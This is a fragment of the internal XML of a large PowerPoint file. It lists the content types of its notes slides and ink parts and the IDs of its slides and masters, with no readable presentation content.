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5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20.xml" ContentType="application/inkml+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide9.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide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notesSlides/notesSlide10.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide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49.xml" ContentType="application/inkml+xml"/>
  <Override PartName="/ppt/ink/ink50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notesSlides/notesSlide16.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide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notesSlides/notesSlide17.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide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notesSlides/notesSlide20.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide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notesSlides/notesSlide21.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide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notesSlides/notesSlide22.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/ink/ink131.xml" ContentType="application/inkml+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide23.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/ink/ink132.xml" ContentType="application/inkml+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide24.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide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29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notesSlides/notesSlide30.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide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notesSlides/notesSlide31.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide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notesSlides/notesSlide32.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide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notesSlides/notesSlide33.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide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notesSlides/notesSlide34.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide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notesSlides/notesSlide38.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/ink/ink287.xml" ContentType="application/inkml+xml"/>
  <Override PartName="/ppt/ink/ink288.xml" ContentType="application/inkml+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide39.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide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notesSlides/notesSlide47.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide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notesSlides/notesSlide48.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide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notesSlides/notesSlide49.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide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notesSlides/notesSlide50.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide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notesSlides/notesSlide51.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide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notesSlides/notesSlide52.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/ink/ink377.xml" ContentType="application/inkml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notesSlides/notesSlide55.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide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notesSlides/notesSlide56.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide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notesSlides/notesSlide57.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide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notesSlides/notesSlide58.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide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notesSlides/notesSlide59.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide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notesSlides/notesSlide60.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide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notesSlides/notesSlide61.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide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ink/ink485.xml" ContentType="application/inkml+xml"/>
  <Override PartName="/ppt/ink/ink486.xml" ContentType="application/inkml+xml"/>
  <Override PartName="/ppt/ink/ink487.xml" ContentType="application/inkml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notesSlides/notesSlide69.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide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ink/ink525.xml" ContentType="application/inkml+xml"/>
  <Override PartName="/ppt/ink/ink526.xml" ContentType="application/inkml+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide72.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/ink/ink527.xml" ContentType="application/inkml+xml"/>
  <Override PartName="/ppt/ink/ink528.xml" ContentType="application/inkml+xml"/>
  <Override PartName="/ppt/ink/ink529.xml" ContentType="application/inkml+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide73.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide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notesSlides/notesSlide79.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide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notesSlides/notesSlide80.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide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notesSlides/notesSlide81.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide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notesSlides/notesSlide82.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide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notesSlides/notesSlide83.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide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notesSlides/notesSlide84.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide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notesSlides/notesSlide85.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide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notesSlides/notesSlide86.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide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notesSlides/notesSlide89.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide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notesSlides/notesSlide90.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide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notesSlides/notesSlide91.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/ink/ink729.xml" ContentType="application/inkml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notesSlides/notesSlide94.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/ink/ink736.xml" ContentType="application/inkml+xml"/>
  <Override PartName="/ppt/ink/ink737.xml" ContentType="application/inkml+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide95.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/ink/ink738.xml" ContentType="application/inkml+xml"/>
  <Override PartName="/ppt/ink/ink739.xml" ContentType="application/inkml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notesSlides/notesSlide98.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/ink/ink753.xml" ContentType="application/inkml+xml"/>
  <Override PartName="/ppt/ink/ink754.xml" ContentType="application/inkml+xml"/>
  <Override PartName="/ppt/ink/ink755.xml" ContentType="application/inkml+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide99.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide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notesSlides/notesSlide100.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide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notesSlides/notesSlide101.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide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ink/ink772.xml" ContentType="application/inkml+xml"/>
  <Override PartName="/ppt/ink/ink773.xml" ContentType="application/inkml+xml"/>
  <Override PartName="/ppt/ink/ink774.xml" ContentType="application/inkml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notesSlides/notesSlide113.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide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notesSlides/notesSlide114.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide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notesSlides/notesSlide115.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/ink/ink818.xml" ContentType="application/inkml+xml"/>
  <Override PartName="/ppt/ink/ink819.xml" ContentType="application/inkml+xml"/>
  <Override PartName="/ppt/ink/ink820.xml" ContentType="application/inkml+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide116.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide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notesSlides/notesSlide117.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide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notesSlides/notesSlide118.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide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notesSlides/notesSlide119.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide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notesSlides/notesSlide120.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide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notesSlides/notesSlide126.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide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notesSlides/notesSlide127.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide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notesSlides/notesSlide128.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide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notesSlides/notesSlide129.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/ink/ink897.xml" ContentType="application/inkml+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide130.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/ink/ink898.xml" ContentType="application/inkml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ink/ink899.xml" ContentType="application/inkml+xml"/>
  <Override PartName="/ppt/ink/ink900.xml" ContentType="application/inkml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notesSlides/notesSlide138.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/ink/ink905.xml" ContentType="application/inkml+xml"/>
  <Override PartName="/ppt/ink/ink906.xml" ContentType="application/inkml+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide139.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/ink/ink907.xml" ContentType="application/inkml+xml"/>
  <Override PartName="/ppt/ink/ink908.xml" ContentType="application/inkml+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide140.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/ink/ink909.xml" ContentType="application/inkml+xml"/>
  <Override PartName="/ppt/ink/ink910.xml" ContentType="application/inkml+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide141.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide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notesSlides/notesSlide142.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide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notesSlides/notesSlide145.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide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notesSlides/notesSlide146.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide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notesSlides/notesSlide147.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide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notesSlides/notesSlide148.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide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notesSlides/notesSlide149.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide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notesSlides/notesSlide150.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/ink/ink980.xml" ContentType="application/inkml+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide151.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/ink/ink981.xml" ContentType="application/inkml+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide152.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide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notesSlides/notesSlide153.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide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notesSlides/notesSlide154.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/ink/ink1004.xml" ContentType="application/inkml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ink/ink1005.xml" ContentType="application/inkml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ink/ink1009.xml" ContentType="application/inkml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notesSlides/notesSlide195.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide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notesSlides/notesSlide196.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide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notesSlides/notesSlide197.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide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ink/ink1037.xml" ContentType="application/inkml+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide201.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/ink/ink1038.xml" ContentType="application/inkml+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide202.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/ink/ink1039.xml" ContentType="application/inkml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notesSlides/notesSlide205.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide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notesSlides/notesSlide211.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide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notesSlides/notesSlide212.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide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notesSlides/notesSlide213.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide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notesSlides/notesSlide214.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide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notesSlides/notesSlide215.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide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notesSlides/notesSlide216.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide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notesSlides/notesSlide217.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide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notesSlides/notesSlide218.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide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notesSlides/notesSlide219.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/ink/ink1148.xml" ContentType="application/inkml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notesSlides/notesSlide222.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/ink/ink1167.xml" ContentType="application/inkml+xml"/>
  <Override PartName="/ppt/ink/ink1168.xml" ContentType="application/inkml+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide223.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide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notesSlides/notesSlide224.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/ink/ink1185.xml" ContentType="application/inkml+xml"/>
  <Override PartName="/ppt/ink/ink1186.xml" ContentType="application/inkml+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide225.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide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notesSlides/notesSlide226.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide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notesSlides/notesSlide227.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide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notesSlides/notesSlide228.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide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notesSlides/notesSlide229.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/ink/ink1207.xml" ContentType="application/inkml+xml"/>
  <Override PartName="/ppt/ink/ink1208.xml" ContentType="application/inkml+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide230.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/ink/ink1209.xml" ContentType="application/inkml+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide231.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide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notesSlides/notesSlide232.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/ink/ink1217.xml" ContentType="application/inkml+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide233.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide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notesSlides/notesSlide234.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide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notesSlides/notesSlide235.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide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notesSlides/notesSlide236.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide237.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/ink/ink1235.xml" ContentType="application/inkml+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide238.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide239.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/ink/ink1236.xml" ContentType="application/inkml+xml"/>
  <Override PartName="/ppt/ink/ink1237.xml" ContentType="application/inkml+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide240.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide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notesSlides/notesSlide241.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide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notesSlides/notesSlide242.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/ink/ink1252.xml" ContentType="application/inkml+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide243.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide244.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide245.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide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notesSlides/notesSlide246.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide247.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide248.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide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notesSlides/notesSlide249.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide250.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/ink/ink1268.xml" ContentType="application/inkml+xml"/>
  <Override PartName="/ppt/ink/ink1269.xml" ContentType="application/inkml+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide251.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/ink/ink1270.xml" ContentType="application/inkml+xml"/>
  <Override PartName="/ppt/ink/ink1271.xml" ContentType="application/inkml+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide252.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide253.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide254.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide255.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide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notesSlides/notesSlide256.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide257.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide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notesSlides/notesSlide258.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide259.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide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notesSlides/notesSlide260.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide261.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide262.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide263.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/ink/ink1301.xml" ContentType="application/inkml+xml"/>
  <Override PartName="/ppt/ink/ink1302.xml" ContentType="application/inkml+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide264.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide265.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide266.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide267.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide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notesSlides/notesSlide268.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide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notesSlides/notesSlide269.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide270.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide271.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide272.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide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notesSlides/notesSlide273.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide274.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide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notesSlides/notesSlide275.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide276.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide277.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide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notesSlides/notesSlide278.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide279.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide280.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide281.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/ink/ink1325.xml" ContentType="application/inkml+xml"/>
  <Override PartName="/ppt/ink/ink1326.xml" ContentType="application/inkml+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide282.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/ink/ink1327.xml" ContentType="application/inkml+xml"/>
  <Override PartName="/ppt/ink/ink132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7"/>
  </p:notesMasterIdLst>
  <p:handoutMasterIdLst>
    <p:handoutMasterId r:id="rId288"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="443" r:id="rId2"/>
    <p:sldId id="1471" r:id="rId3"/>
    <p:sldId id="1140" r:id="rId4"/>
    <p:sldId id="1142" r:id="rId5"/>
    <p:sldId id="1564" r:id="rId6"/>
    <p:sldId id="1565" r:id="rId7"/>
    <p:sldId id="1566" r:id="rId8"/>
    <p:sldId id="1554" r:id="rId9"/>
    <p:sldId id="1144" r:id="rId10"/>
    <p:sldId id="1145" r:id="rId11"/>
    <p:sldId id="1146" r:id="rId12"/>
    <p:sldId id="1147" r:id="rId13"/>
    <p:sldId id="1148" r:id="rId14"/>
    <p:sldId id="1149" r:id="rId15"/>
    <p:sldId id="1150" r:id="rId16"/>
    <p:sldId id="1151" r:id="rId17"/>
    <p:sldId id="1152" r:id="rId18"/>
    <p:sldId id="1153" r:id="rId19"/>
    <p:sldId id="1567" r:id="rId20"/>
    <p:sldId id="1569" r:id="rId21"/>
    <p:sldId id="1568" r:id="rId22"/>
    <p:sldId id="1570" r:id="rId23"/>
    <p:sldId id="1571" r:id="rId24"/>
    <p:sldId id="1572" r:id="rId25"/>
    <p:sldId id="1160" r:id="rId26"/>
    <p:sldId id="1462" r:id="rId27"/>
    <p:sldId id="1463" r:id="rId28"/>
    <p:sldId id="1464" r:id="rId29"/>
    <p:sldId id="1465" r:id="rId30"/>
    <p:sldId id="1466" r:id="rId31"/>
    <p:sldId id="1467" r:id="rId32"/>
    <p:sldId id="1468" r:id="rId33"/>
    <p:sldId id="1469" r:id="rId34"/>
    <p:sldId id="1161" r:id="rId35"/>
    <p:sldId id="1162" r:id="rId36"/>
    <p:sldId id="1163" r:id="rId37"/>
    <p:sldId id="1520" r:id="rId38"/>
    <p:sldId id="1489" r:id="rId39"/>
    <p:sldId id="1490" r:id="rId40"/>
    <p:sldId id="1521" r:id="rId41"/>
    <p:sldId id="1522" r:id="rId42"/>
    <p:sldId id="1577" r:id="rId43"/>
    <p:sldId id="1523" r:id="rId44"/>
    <p:sldId id="1491" r:id="rId45"/>
    <p:sldId id="1579" r:id="rId46"/>
    <p:sldId id="1492" r:id="rId47"/>
    <p:sldId id="1493" r:id="rId48"/>
    <p:sldId id="1494" r:id="rId49"/>
    <p:sldId id="1495" r:id="rId50"/>
    <p:sldId id="1496" r:id="rId51"/>
    <p:sldId id="1497" r:id="rId52"/>
    <p:sldId id="1498" r:id="rId53"/>
    <p:sldId id="1499" r:id="rId54"/>
    <p:sldId id="1500" r:id="rId55"/>
    <p:sldId id="1501" r:id="rId56"/>
    <p:sldId id="1502" r:id="rId57"/>
    <p:sldId id="1503" r:id="rId58"/>
    <p:sldId id="1504" r:id="rId59"/>
    <p:sldId id="1505" r:id="rId60"/>
    <p:sldId id="1506" r:id="rId61"/>
    <p:sldId id="1507" r:id="rId62"/>
    <p:sldId id="1510" r:id="rId63"/>
    <p:sldId id="1511" r:id="rId64"/>
    <p:sldId id="1513" r:id="rId65"/>
    <p:sldId id="1616" r:id="rId66"/>
    <p:sldId id="1617" r:id="rId67"/>
    <p:sldId id="1619" r:id="rId68"/>
    <p:sldId id="1618" r:id="rId69"/>
    <p:sldId id="1626" r:id="rId70"/>
    <p:sldId id="1627" r:id="rId71"/>
    <p:sldId id="1628" r:id="rId72"/>
    <p:sldId id="1629" r:id="rId73"/>
    <p:sldId id="1630" r:id="rId74"/>
    <p:sldId id="1516" r:id="rId75"/>
    <p:sldId id="1517" r:id="rId76"/>
    <p:sldId id="1518" r:id="rId77"/>
    <p:sldId id="1519" r:id="rId78"/>
    <p:sldId id="1624" r:id="rId79"/>
    <p:sldId id="1167" r:id="rId80"/>
    <p:sldId id="1168" r:id="rId81"/>
    <p:sldId id="1169" r:id="rId82"/>
    <p:sldId id="1170" r:id="rId83"/>
    <p:sldId id="1171" r:id="rId84"/>
    <p:sldId id="1172" r:id="rId85"/>
    <p:sldId id="1173" r:id="rId86"/>
    <p:sldId id="1174" r:id="rId87"/>
    <p:sldId id="1179" r:id="rId88"/>
    <p:sldId id="1665" r:id="rId89"/>
    <p:sldId id="1524" r:id="rId90"/>
    <p:sldId id="1525" r:id="rId91"/>
    <p:sldId id="1180" r:id="rId92"/>
    <p:sldId id="1181" r:id="rId93"/>
    <p:sldId id="1182" r:id="rId94"/>
    <p:sldId id="1183" r:id="rId95"/>
    <p:sldId id="1184" r:id="rId96"/>
    <p:sldId id="1185" r:id="rId97"/>
    <p:sldId id="1186" r:id="rId98"/>
    <p:sldId id="1187" r:id="rId99"/>
    <p:sldId id="1188" r:id="rId100"/>
    <p:sldId id="1189" r:id="rId101"/>
    <p:sldId id="1190" r:id="rId102"/>
    <p:sldId id="1191" r:id="rId103"/>
    <p:sldId id="1192" r:id="rId104"/>
    <p:sldId id="1193" r:id="rId105"/>
    <p:sldId id="1194" r:id="rId106"/>
    <p:sldId id="1196" r:id="rId107"/>
    <p:sldId id="1197" r:id="rId108"/>
    <p:sldId id="1198" r:id="rId109"/>
    <p:sldId id="1201" r:id="rId110"/>
    <p:sldId id="1652" r:id="rId111"/>
    <p:sldId id="1649" r:id="rId112"/>
    <p:sldId id="1473" r:id="rId113"/>
    <p:sldId id="1658" r:id="rId114"/>
    <p:sldId id="1651" r:id="rId115"/>
    <p:sldId id="1653" r:id="rId116"/>
    <p:sldId id="1654" r:id="rId117"/>
    <p:sldId id="1657" r:id="rId118"/>
    <p:sldId id="1655" r:id="rId119"/>
    <p:sldId id="1208" r:id="rId120"/>
    <p:sldId id="1209" r:id="rId121"/>
    <p:sldId id="1210" r:id="rId122"/>
    <p:sldId id="1211" r:id="rId123"/>
    <p:sldId id="1212" r:id="rId124"/>
    <p:sldId id="1486" r:id="rId125"/>
    <p:sldId id="1482" r:id="rId126"/>
    <p:sldId id="1631" r:id="rId127"/>
    <p:sldId id="1484" r:id="rId128"/>
    <p:sldId id="1485" r:id="rId129"/>
    <p:sldId id="1526" r:id="rId130"/>
    <p:sldId id="1659" r:id="rId131"/>
    <p:sldId id="1581" r:id="rId132"/>
    <p:sldId id="1527" r:id="rId133"/>
    <p:sldId id="1661" r:id="rId134"/>
    <p:sldId id="1660" r:id="rId135"/>
    <p:sldId id="1528" r:id="rId136"/>
    <p:sldId id="1529" r:id="rId137"/>
    <p:sldId id="1530" r:id="rId138"/>
    <p:sldId id="1531" r:id="rId139"/>
    <p:sldId id="1533" r:id="rId140"/>
    <p:sldId id="1534" r:id="rId141"/>
    <p:sldId id="1535" r:id="rId142"/>
    <p:sldId id="1536" r:id="rId143"/>
    <p:sldId id="1662" r:id="rId144"/>
    <p:sldId id="1663" r:id="rId145"/>
    <p:sldId id="1664" r:id="rId146"/>
    <p:sldId id="1537" r:id="rId147"/>
    <p:sldId id="1538" r:id="rId148"/>
    <p:sldId id="1539" r:id="rId149"/>
    <p:sldId id="1540" r:id="rId150"/>
    <p:sldId id="1541" r:id="rId151"/>
    <p:sldId id="1542" r:id="rId152"/>
    <p:sldId id="1543" r:id="rId153"/>
    <p:sldId id="1544" r:id="rId154"/>
